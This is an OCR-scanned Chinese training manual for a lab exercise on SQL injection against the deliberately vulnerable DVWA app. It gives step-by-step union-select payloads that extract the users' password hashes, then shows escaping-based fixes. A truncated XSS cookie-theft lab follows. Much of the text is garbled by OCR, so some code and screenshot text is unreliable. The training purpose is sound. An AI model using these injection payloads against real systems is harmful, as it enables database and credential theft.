




版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
信息安全發(fā)展態(tài)勢與知識拓展
實訓項目指導手冊
V1.0
闔大支喊/抵斫號帆
OWODONOKVlfOMCOFKD^YW*MOCOMtfKt尋真求是格物致知
目錄
Web安全應用分析之SQL注入及防護配置2
實驗概述2
實驗環(huán)境2
前提條彳牛2
實驗;耀2
實驗目標3
任務1環(huán)境準備3
任務2判斷注入點5
任務3猜測字段數(shù)7
任務4執(zhí)行Union聯(lián)合查詢9
任務5獲取數(shù)據(jù)10
任務6SQL注入防護13
,支N午喊才抵斫多忱
I尋真求是格物致知
?CUMCXM3KivTEOMCBIO4TW?MO(XMKi
Web安全應用分析之SQL注入及防護配置
實驗概述
SQL注入是比較常見的網(wǎng)絡攻擊方式之一,它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊,
而是針對程序員編寫時的疏忽,通過SQL語句,實現(xiàn)無賬號登錄,甚至篡改數(shù)據(jù)庫。凡有
SQL注入漏洞的程序都是因為程序要接受來自客戶端用戶輸入的變量或URL傳遞的參數(shù),
并且這個變量或參數(shù)是組成SQL語句的一部分。
DVWA(DamVulnerableWebApplication)是用PHP+Mysql編寫的一套用于常規(guī)
Web漏洞教學和檢測的Web脆弱性測試程序。提供Low、Medium.High.Impossible
四個安全級別,包含了SQL注入、XSS、CSRF等常見的Web安全漏洞。
HackBar是Firefox提供的插件,主要功能有:網(wǎng)址的載入訪問、聯(lián)合查詢、各種編碼
/解碼、數(shù)據(jù)加密等。HackBar可以幫助安全人員測試SQL注入、XSS、CSRF等安全漏洞
以及網(wǎng)站的安全性。
實驗環(huán)境
攻擊機:WindowsServer2016(01-Windows攻擊機),IP:30
靶機:(攻擊機)
WindowsServer201501-WindowsfIP:30
集成環(huán)境:PhpStudy
網(wǎng)站:DVWA-vl.10,low安全級別
前提條件
本實驗要求:
?熟悉Windows基本操作
?熟悉基本的SQL語句
實驗流程
僦%女工里喊才抵斫后帆
KimowcOFM04TW*MOCOMtfKf尋真求是格物致知
實驗目標
完成本實驗后,將能夠:
?了解SQL注入原理
?掌握基本SQL注入方法
?掌握SQL注入漏洞防護方法
任務1環(huán)境準備
【任務目標】
啟動動態(tài)網(wǎng)站集成環(huán)境,并訪問SQL注入站點。
【任務步驟】
1.啟動動態(tài)網(wǎng)站集成環(huán)境
雙擊桌面的"phpstudy"集成環(huán)境,并單擊“啟動"按鈕,運行網(wǎng)站。
2.瀏覽器訪問SQL注入站點
雙擊桌面的"火狐瀏覽器",在URL地址欄中輸入:
/dvwa/login.php
OWIIOMIKUTCOWCvNOUSWMOaaaea尋真求是格物致知
輸入默認賬號和密碼登錄網(wǎng)站:
賬號:admin
密碼:password
文GDKB00歷史⑸=?5?IJKD-OX
■WHcome:QimnVulnrX+
G0127X).0.1/dvw4/indcx.phpVHOCQ酉&<CtH^K>☆6?ft?三
D破
WelcometoDamnVulnerableWebApplication!
InstructionsDeemXMheraUeWebAppiKalon(UVWA)isaPHRtlySOlw?0ap(M>caikr)thatisdaninAiheraErieitsmam
90alt$tobeanaidlocseorrtyprotessKX^Htoleslttwr$kil$andlooKmBtegalenvironment,3的
SMup/Rts?tD6develo阿sbetterundwstandtheprocessesofsecunngwebappUabons?*1loaidbothstudents&teachersio
2naixxitwebappicabon$ecur<yinaconlroMedclassroomenvronmen
BruteForsTNeanofDVWA?Iopfeetic*ofmo?tcommonw*bvuln*r?bMM”withvaHoueof
dWWcuWyasmpteWQhttorwaBCeclKg
CommandInjection
CSRF
FileInclusionGeneralInstructions
FileUploadItt$upIotheuserhowgyappeoechDVWAE<herbywodongtroughmfi<ymoduleXafncedteveior
sotocbrganymodUoandworknguploroachthohghoatovoitheyc4nbetoconxwngontothonextonoThora
InMeurtCAPTCHAsnotafucodobfcctlocompkrtcamodulohowevofusersstuxAlio<HthattwryhavesucccnsliJtyaxplotodth?
systemasbestastheyposs<?tecouldMusriflMpartKuiarwhmaMfty
SQLlection
SQLl*cttoa(Blind)Re?ono<otbcfcarcbothdocumentedandundocumentedvulnerabeltywiththssoftwareThisti
ntentKnalYouaregneour899dlohyandOscover夠manyessu^saspossible
WeakSessionIDs
DVWAalsondudesaWebAfpicabonFrewal(WAF),PHP1DS.wtKhCMbeenabled81anysiaoeloftjrthec
XSS(DOMJocreasethedrtkulfyThtswildemonstratehow83ngancMherlayerorsecuritymayMockcenanmalicious
?ctcmiNot?.th?f?nhiovanouspubk:nwKhodsAtbypassingthw?protecliom《soMamg3nas*m
XSS(Reflected)axtonsonformoreat}wteedusontjl
XSS(Stored)
Iggtiarw^>buttonatttwbotlocnoleachwhichalowsyouloviewIwKs&bpstorthat%Vh?rablt)f
C$PByptwThere*eatooadducnaisnksforfunhecbddyyoundreodng,whthrelatwtor*atsecuntyissue
單擊左側菜單導航欄的“SQLInjection",進入SQL注入頁面。
裝笑尋真求是格物致知
任務2判斷注入點
【任務目標】
利用加單引號等方式,判斷頁面是否存在注入點。
【任務步驟】
1.判斷是否存在注入點
在輸入框中,輸入:1并單擊"Submit"按鈕提交。
HomeVulnerability:SQLInjection
Instructions
Setup/ResetDBUserIDjSubmit
ID:1
BruteForceFirstnano:admin
Surnaae:adnin
CommandInjection
CSRF
FileInclusionMoreInformation
FileUpload?http?:/Awww.—curit-m.com/?tcurityfvitw?/6DP0N1P76E.html
?一口…
InsecureCAPTCHASQIRL
?MtptWwwwJWteoartc-Wblo<tfwb-curity/,qldnject)onYhejt《htV
?hftp$:@mEunlty/|ttti>ClcWSQL
EESS—?https
SQLInjection(Blind)
頁面回顯了ID為1的用戶姓名信息,說明頁面正常。
繼續(xù)在輸入框中,輸入:1'并單擊"Submit”按鈕提交。
闔I大支N午囁才抵斫夕自
OW0OONOKUTKIMC9iMmMOCOMBtt尋真求是格物致知
D
HomeVulnerability:SQLInjection
Instructions
UserID卜ISUE
Setup/ResetDB
BruteForce
CommandInjectionMoreInformation
CSRF
FileInclusion
FileUpload
InsecureCAPTCHA
SQLInjection(Blind)
文*E)0■㈤歷史(S=HS(6)TJKD*W)(H)-
1270.0.1/dvwaMilnefdbilititX+
?①127?0.0.1/dvw<Mjlrk|li/?id=1'&Sub<nit=Submit#■■8MCd百St<CUi/K>☆總?俞
TewhavoanerrorinyourSQL加3,chockth?ninualthatccar^^andBtoyourlySQLcarvarvorsicnforth?rightsyntaxtous。noir**f**atlino1
頁面報錯并顯示了錯誤信息,根據(jù)錯誤信息可以了解到此錯誤為語法錯誤,數(shù)
據(jù)庫類型為MySQL。
注:因為該站點為字符型注入漏洞,所以需要構造閉合語句。
構造如下閉合邏輯語句:
1'and1=1#
可以看到語句能夠成功被服務器執(zhí)行,并顯示正常的頁面信息。
繼續(xù)構造閉合邏輯語句:
1'and1=2#
支N午囁*抵斫多忱
"MMfiMMlOUmMCVRMTMMOOOMBCI尋真求是格物致知
可以看到語句能夠成功被服務器執(zhí)行,但頁面沒有正常信息回顯。
根據(jù)以上執(zhí)行結果判斷,該頁面確定存在SQL注入漏洞。
任務3猜測字段數(shù)
【任務目標】
通過orderby猜測查詢的字段數(shù)量。
【任務步驟】
1.猜測字段數(shù)為10
構造如下閉合語句:
1'orderby10#
Vulnerability:SQLInjection
UserID:[rorderby10#Submit
MoreInformation
?/securjtvreviews/5DP0N1P76E.html
?http6:〃en.wikipedia.oro^iki/SQLinjection
?http8:〃/bloq/web-8ecurity/s-ctionYheat-sheet/
?https:〃owaso.orcAyww?conimunity/attack6/SQLInjection
?/
頁面報錯,并顯示不存在10個長度的字段,說明字段數(shù)小于10。因此范圍在I
到10之間。
翁1%支噴才投斫后帆
tuMOCMiKUTEOMCvNOUSWMOcoaea尋真求是格物致知
文件(£)編鋁⑹查看Q)歷史(S)書簽⑥工具(D幫助(H)
httpV/127.0bmit=Submit#X+
<</dvwa/vulnerabili:ies/sqli/?id=T+order+by+10?1U焦C5百度<Ct”+K>
Unknowncolumn'10'in,orderclause'
2.猜測字段數(shù)為5
一般采用"二分”方法來猜測字段數(shù),如:第一次猜測為100,下一次為50,
再下一次為25以此類推,直到猜出正確的字段數(shù)。
繼續(xù)構造:
1'orderby5#,同樣顯示錯誤,說明數(shù)量不為5。
文件(E)據(jù)運⑹查看(V)歷史(S)書簽(B)工具(I)幫助(H)
http://127.0bmit=Submit#X+
6:①/dvwa/vulnerabilities/sqli/?id=1'+order+by+5+%電賽GQ百度
Unknowncolumn'5'inJorderclause1
3.猜測字段數(shù)為3
繼續(xù)構造:
1'orderby3#,同樣顯示錯誤,說明數(shù)量不為3。
文件(B??(E)查看M歷史(S)書釜(B)工具CD幫助(H)
http://127.0bmit=Submit^X+
6/dvwa/vulnerabilities/sqli/?id=1'+order+by+3+%。賽Cd百度<Ctrl+K>
Unknowncolumn'3'in*orderclause,
年支喊才抵斫字帆
awoocM)KimoMCOFveusrmMOCOMOQ尋真求是格物致知
4.猜測字段數(shù)為2
繼續(xù)構造:
11orderby2#,頁面顯示正常,說明字段數(shù)量為2。
Vulnerability:SQLInjection
UserID:£orderby2#Submit
ID:1'orderby2#
Firstname:admin
Surname:admin
MoreInformation
?/6ecurrtyreviews/5DP0N1P76E.html
?https:〃en.wikipedia.orBwiki/SQLinjection
?httD8://spari(/bloQ/web-8ecuritv/s-ctionYheat-sheet/
?http6:〃owasp.ora/wwwvommunltv/attacks/SQLInjection
?https://bobbv-tables.cofn/
任務4執(zhí)行Union聯(lián)合查詢
【任務目標】
通過執(zhí)行union聯(lián)合查詢,確定回顯位置。
【任務步驟】
1.構造聯(lián)合查詢語句
確定查詢字段數(shù)量后,可以通過聯(lián)合查詢語句來確定數(shù)據(jù)回顯的位置,最后通過
該位置獲取數(shù)據(jù)庫中的敏感信息。
構造如下語句:
11unionselect1,2#,有多少個字段數(shù),select后面就加上對應的數(shù)字。
年支^曾喊才抵斫字帆
OMMIOCM}KimOMCOFiCuSTmMOCCMtKf尋真求是格物致知
Vulnerability:SQLInjection
UserID:|_____Submit
ID:1,unionselect1,2i
Firstname:admin
Surname:admin
ID:1'unionyelect1,21
Su^namSrr]—此處的1和2即為回顯位置
MoreInformation
?https:/9ecuritvreview8/5DP0N1P76E.html
?https:〃en.wikloedia.orafwikl/SQLiniection
?sparkercom/bloq/web?securitv/sqHniection-ch-eet/
?https://owagp.oro/wwwcommunitv/attacks/SQLIniection
?/
任務5獲取數(shù)據(jù)
【任務目標】
通過構造并執(zhí)行unionselect查詢語句,獲取數(shù)據(jù)庫中的數(shù)據(jù)信息。
【任務步驟】
1.獲取數(shù)據(jù)庫相關信息
通過內(nèi)嵌函數(shù)version。,database。等獲取數(shù)據(jù)庫版本信息和數(shù)據(jù)庫名。
構造語句:
1'unionselectversion(),database()#
Vulnerability:SQLInjection
UserID:|Submit
ID:1*unionselectversion(),database()#
Firstname:admin
Surname:admin
ID:1,unionselectversion()database()I
Firstname:5.5.53
Surname:dvwa
MoreInformation
?/securitvreview8/5DP0N1P76E.html
?https:〃en.wildpedia.orafwikl/SQLinlection
?sparkercom/bloq/web-securitY/sql-iniection~ch-eet/
?https://owa9P.orQ/wwwcommunitv/attacks/SQLIniection
?/
支喊才抵斫多虎
OW??CNOKimOMCOFMOcawa尋真求是格物致知
得到數(shù)據(jù)庫名為:dvwa,MySQL數(shù)據(jù)庫版本為5.5.53。
2.獲取數(shù)據(jù)庫表名
在MySQL版本大于5時,默認存在information_schema庫,該庫中存在其
他庫的所有數(shù)據(jù)。
根據(jù)已經(jīng)獲得的信息,繼續(xù)構造語句,獲取數(shù)據(jù)庫表名:
1'unionselecttable_name,2frominformation_schema.tableswheret
able_schema='dvwa'#
Vulnerability:SQLInjection
UserID:[Submit
ID:1?unionselecttabl€_namer2frominformation_schema.tableswheretable_sclema-tdvwa*t
Firstname:admin
Surnanve:admin
ID:1,unionselecttable-namcz2frominformation_schema.tableswheretable_sciema=?dvwa??
Firstname:guestbook
Surnanie:2
ID:1?unionselecttable_name,2frominformation_schenMi.tobieswheretable_sc>ema=*dvwa*I
Firstname:users
Surname:2
MoreInformation
可以看到,在1的回顯位置上,顯示了兩張數(shù)據(jù)庫表名:guestbook,users.其
中users表名存在管理員帳號密碼可能性最大。
3.獲取字段名
繼續(xù)構造聯(lián)合查詢語句,獲取users表的字段名:
1'unionselectcolumn_name,2frominformation_schema.columnswh
eretable_schema='dvwa'andtable一name='users'#
Vulnerability:SQLInjection
UMr10:Subcrw:
ID:1,unionsalactfrcalnfomation_schama.columnswbaratablo^ichama*'dvwa'andtabla_n<knA?ausors(■
Pirstna?e:acbiin
Surname:adam
ID:1,1nmfro*intorMtion_sch<m*.coluamtwMr?table_cMM^'dvwa*andI
Firstnase:user-id
Surnanft:2
ID:11unio>selectc?!縐Lnjdm,:frominfornation_schema.columnswb?retdble_jchema?*dvwa?andtoble_najw?,users,I
Firstnaso:flrst_nAna
Surname:2
ID:1?unioiselectcolfro?infornation__schema.columnswheretable_schema*,dvwa,andtable_nan???users,I
firstna?e:lasjnag
Surnam:2
ID:1,unioiselectcoliaai_n^me,2fro?mforn^tion-schema.colxiainswheretable_schemastdvwatandtable-nanjea,users?t
Firstnasc:user
Surname:2
ID:1?unioiselectcolHTJIname,:froaainforn^tionschcma.columnswheretable;chcma-tdvwa,andtable_nanjc<?ausers?$
Firstnase:password
Surname:2
ID:1?unioiselectcoli?n_nan)e2freminfornAtion_schema.columnswheretable_schema**<!¥*??andtable_nan???users?i
Firstnaxe:avatar
Surname:2
得到8個字段名,猜測userfflpassword字段分別存在賬號和密碼。
夕OMMOONOKUTKMViMmOOM0CI尋真求是格物致知
4.獲取字段內(nèi)容
構造SQL查詢語句,獲取字段use杯口password里面的內(nèi)容:
1'unionselectuser,passwordfromusers#
Vulnerability:SQLInjection
UserID:|Submit
ID:1,unionselectuser,passwordfromusers*
Firstname:admin
Surname:admin
ID:1,ust
Firstnate:admin
Surname:5£4duu3b5aa765d61d8327deb882u£99
ID:1?unionselectuserzpasswordfromusers#
Firstname:gordonb
Surname:e99al8c428cb38d5f260853678922e03
ID:1?unionselectuser,passwordfromusers#
Firstname:1337
Surname:8d3533d75ae2c3966d7e0d4fcc69216b
ID:1*unionselectuser,passwordfromusers#
Firstname:pablo
Surname:0dl07d09f5bfce40cade3de5c71e9e9b7
ID:1?unionselectuser,passwordfromusers*
Firstname:smithy
Surname:5f4dcc3b5aa765d61d8327deb882cf99
最終得到5個用戶的賬號和密碼,其中包括管理員賬號和密碼:
admin/5f4dcc3b5aa765d61d8327deb882cf99
5.密碼解密
由于多數(shù)站點的默認數(shù)據(jù)庫用戶密碼加密方式為:MD5哈希算法,而dvwa站
點默認也是采用此算法進行密碼加密。因此,可以將密碼放到在線解密網(wǎng)站進行
解密。
例如:
14支N午囁*抵斫多忱
/tumoocM)KuitOMCvNOUSTW*MOccMKf尋真求是格物致知
最終得到admin用戶的密碼為password
任務6SQL注入防護
M弗目標】
通過在頁面中加入防護代碼,實現(xiàn)對SQL注入漏洞的代碼級防護效果。
【任務步驟】
1.mysqLreal_escape_string()函數(shù)
mysql_real_escape_string()函數(shù)可以將用戶輸入的特殊字符進行轉義。轉義
的特殊字符包括:\x00
'(單引號)
"(雙引號)
\xla
進入C:\phpStudy\PIIPTutorial\WWW\DVWA\vulnerabilities\sqli\source\
文件夾,編輯low.php文件。
將$id=$_REQUEST['id'];修改為
$id=mysql_real_escape_string($_REQUEST['id']);
)大支N午噴才抵斫個帆
@尋真求是格物致知
UfCAphgtudy\PHPTu?x6WWW\DVWA\vUhewbHitF;$qiMoureVow.phpNottfMd??|Admini$trat<x)-OX
文KF)MlE)W?(S)?B???(N)i8Ba)??(T|111(0)京M)運行四?5(P)?O(W)?
a
。,區(qū)90rt9C?、?二FBI,■/曲組?3■町?■>Q?
日18.陽引
1?<?php
3iffisset($_REQUEST[?Submit*))){
4//Getinput
|$id=mysql_real_escape_string($_REQUEST(*id*))*1
//Checkdatabase
M
$query="SELECTfirst_namerlast_nameFROMusersWHEREuser_id='$id*;;
Mw",
$result=mysqli_query($GLOBALS(mysqliston]r$query)ordie(<pre>
//Getresults
121rwhile($row-mysqli_fetch_assoc($result)){
13//Getvalues
$first-$row[Mfirst_nameM];
$last-$row
17//Feedbackforenduser
$html.=R<pre>ID:!$id)<br/>Firstname:{$first}<br/>Surname:{$last)<
19}
20
mysqliclose($GLOBALS('*my^qlistonH));
保存并退出編輯。
2.驗證漏洞修復結果
在SQL注入頁面中,執(zhí)行1'and1=1#語句。
文杵(D查?儀)歷史⑸書25?IM(DWK11)
■Vulnerability:SQLinject-X+
612/O.ai/dvwaZvulnefabii>3DU%23&Sub■■CQ國T<a臺?翁今
D
HomeVulnerability:SQLInjection
Instructions
Setup/ResetDBUserIDrand1-1?Submit
BruteForce
CommandInjoctionMoreInformation
CSRF
FileInclusion
FileUpload
InsecureCAPTCHA
SQLInjection(Blind)
WeakSessionIDs
XSS(DOM)
XSS(R*n?ct?d)
vee
可以看到頁面已經(jīng)不再顯示任何內(nèi)容,也沒有報錯提示,說明漏洞已經(jīng)修復成
功。
3.addslashes()函數(shù)
addslashes。函數(shù)同樣可以將特定字符進行轉義,從而達到修復效果。
進入C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\sqli\source\
文件夾,編輯low.php文件。
筱大支"喊才抵樞自
euMMM?am?MevveumMOOOMKI尋真求是格物致知
將$id=$_REQUEST['id'];修改為
$id=addslashes($_REQUEST['id']);
4.驗證漏洞修復結果
在SQL注入頁面中,執(zhí)行1'and1=1#語句。
Vulnerability:SQLInjection
UsorID:T?nd1=1sSubmit
BruteForce
CommandInjectionMoreInformation
CSRF
FileInclusion
Fil?Upload
InsecureCAPTCHA
可以看到頁面已經(jīng)不再顯示件可內(nèi)容,也沒有報錯提示,說明漏洞已經(jīng)修復成
功。
注:上述修復方式并非完全修復漏洞,攻擊者仍然有多種方法可以利用漏洞。
年支喊才抵斫字帆
awoocM)KimoMCOFveusrmMOCOMOQ尋真求是格物致知
至此,實驗結束。
展委二呼喊埼投折字悅
GUANGDONGPaYTECHNCOFINDUSTRYANDCOMMERCE
信息安全發(fā)展態(tài)勢與知識拓展
實訓項目指導手冊
V1.0
OMMODCM)KUTECHCOFRDiSTW*MOCOMtfKl尋真求是格物致知
目錄
XSS跨站腳本點擊劫持分析及防護18
概述18
實驗環(huán)境18
前提條彳牛18
實驗;府呈18
實驗目標18
任務1反射型XSS漏洞利用19
任務2存儲型XSS漏洞利用22
任務3XSS漏洞防護29
午喊/抵叫多忱
CUMCXM3KVTBOHCBiMTmMOCOMKi尋真求是格物致知
xss跨站腳本點擊劫持分析及防護
概述
跨站腳本攻擊XSS(CrossSiteScripting)是惡意攻擊者往Web頁面里插入惡意Script
代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的Script代碼會被執(zhí)行,從而達到惡意攻
擊用戶的目的。XSS攻擊針對的是用戶層面的攻擊,可以用來進行釣魚攻擊、前端js挖礦、
用戶cookie獲取,甚至可以結合瀏覽器自身的漏洞對用戶主機進行遠程控制等。XSS跨站
腳本攻擊分為三類:反射型XSS(reflected).存儲型XSS(stored),DOMBasedXSS。
本實驗使用的靶場環(huán)境為:DVWA、bWAPP。
實驗環(huán)境
攻擊機:WindowsServer2016(01-Windows攻擊機),IP:30
靶機:WindowsServer2015(03-Windows靶機),IP:56
前提條件
本實驗要求:
?熟悉Windows基本操作
?熟悉基本的PHP函數(shù)和HTML標簽
實驗流程
反射型XSS漏洞利用存儲型XSS漏洞利用XSS漏洞防護
實驗目標
完成本實驗后,您將能夠:
?掌握xss漏洞基本利用方法
?掌握利用XSS獲取用戶cookie的方法
?掌握xss漏洞的代碼級防護方法
闔I大支N午囁才抵斫夕自
OW0OONOKUTKIMC9iMmMOCOMBtt尋真求是格物致知
任務I反射型XSS漏洞利用
【任務目標】
構造XSS代碼,觸發(fā)反射型XSS攻擊,并通過反射型XSS漏洞,獲取用戶
信息。注:本實驗靶場為:
cookieDVWAO
【任務步驟】
1.靶機開啟網(wǎng)站環(huán)境
在靶機上,運行PhpStudy網(wǎng)站環(huán)境。
2.攻擊機訪問靶機DVWA站點
在攻擊機打開瀏覽器訪問http:〃〈靶機IP>/dvwa/login.php,賬號:admin,
密碼:password
文杵(E)Wib歷史&)引答(fi)工具(D.口X
login::DamnVulnerableV/.X+
4?①「92.168200.156/dvw“l(fā)ogin.php|『S?Cd百度<CtthK>Q自4?俞與三
闔%支N午囁才抵斫夕自
OUIMOOONOIOUTKMOFmmMOCOMSKI尋真求是格物致知
3.設置安全等級
在DVWA首頁,單擊左側菜單欄"DVWASecurity",將安全等級設置為:
low。
文aDMID歷史0襁@[,0)*皿
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年大型商場租賃及商業(yè)數(shù)據(jù)分析合作協(xié)議
- 稻谷除雜烘干、倉儲自動一體化生產(chǎn)線建設項目可行性研究報告
- 2024-2030年中國零售行業(yè)發(fā)展監(jiān)測及發(fā)展趨勢預測報告
- Unit 5 Into the wild Developing ideas Writing an animal fact file 教學設計-2024-2025學年高一英語外研版(2019)必修第一冊
- 2025年中國不溶性糖精行業(yè)發(fā)展趨勢預測及投資戰(zhàn)略咨詢報告
- 生活農(nóng)產(chǎn)品深加工可行性研究報告申請建議書
- 2025年中國寬帶網(wǎng)絡行業(yè)發(fā)展趨勢預測及投資規(guī)劃研究報告
- 2025年度酒店式公寓返租回報資金監(jiān)管服務合同
- 2025年中國未凈化水濾網(wǎng)行業(yè)市場發(fā)展前景及發(fā)展趨勢與投資戰(zhàn)略研究報告
- 汽車投標合同范本
- 肌肉注射新版本
- 2021年4月自考00808商法試題及答案含解析
- 新人通識訓試卷附有答案
- 思明區(qū)公開招聘非在編聘用人員報名表
- (高清版)DZT 0216-2020 煤層氣儲量估算規(guī)范
- 拖拉機駕駛員培訓(課件)
- TCASWSS 025-2024 老年大學課程設置規(guī)范
- 課堂互動和學生參與度提升
- 兩辦意見八硬措施煤礦安全生產(chǎn)條例宣貫學習課件
- 教師課堂教學語言技能范例課件
- 《體育與健康說課》課件
評論
0/150
提交評論